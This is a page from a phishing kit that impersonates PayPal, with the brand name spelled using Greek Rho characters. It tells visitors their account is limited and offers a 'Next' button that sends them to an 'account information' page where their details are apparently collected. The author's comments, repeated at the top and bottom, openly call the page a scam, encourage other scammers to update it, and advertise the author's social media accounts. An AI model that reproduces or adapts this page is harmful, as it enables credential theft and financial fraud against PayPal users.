<!-- 
Hi guys this Scam is Edited by RooT-MrX

You need to Change page Login because it's Very Old! (2015)
So work Hard and Good luck my Brother!

Wait for my Personal Scam... Coming soon inchaaLah [Smart,Full inFo,Speed,Work in All Device,New Style 2016] ^_^ 
___________________________________________
Follows us :

FaceBook         #==>   Fb.com/root0blog
YouTube          #==>   Bit.do/caheA
Twitter          #==>   Twitter.com/mrxroot
Google Plus      #==>   Bit.do/caheL
web site         #==>   RooT-Mrx.blogspot.com
-->
<html>
<head>
<title>Access &Rho;ay&Rho;al</title>
<link rel="stylesheet" href="./css/hiho.css">
<link rel="shortcut icon" link rel="logo-icon" href="./img/pp_favicon_x.ico">
</head>
<body>
<div class="sec">
<img src="./img/exc.png" alt="" width="120px" style="margin-left: 53px;" />
<h2 style="font-size: 28px; font-weight: normal;"> Still using &Rho;ay&Rho;al? </h2>
<h4 style="font-weight: normal; color: #646464; margin-left: 5px;"> We'll Fix Your Account Limitations.</h4>
<form action="account information.html" method="POST">
<button type="submit" value="Continue" class="btncon" style="width: 320px; margin-left: -47px;">Next</button>
</form>
</div>
</body>
</html>
<!-- 
Hi guys this Scam is Edited by RooT-MrX

You need to Change page Login because it's Very Old! (2015)
So work Hard and Good luck my Brother!

Wait for my Personal Scam... Coming soon inchaaLah [Smart,Full inFo,Speed,Work in All Device,New Style 2016] ^_^ 
___________________________________________
Follows us :

FaceBook         #==>   Fb.com/root0blog
YouTube          #==>   Bit.do/caheA
Twitter          #==>   Twitter.com/mrxroot
Google Plus      #==>   Bit.do/caheL
web site         #==>   RooT-Mrx.blogspot.com
-->
	  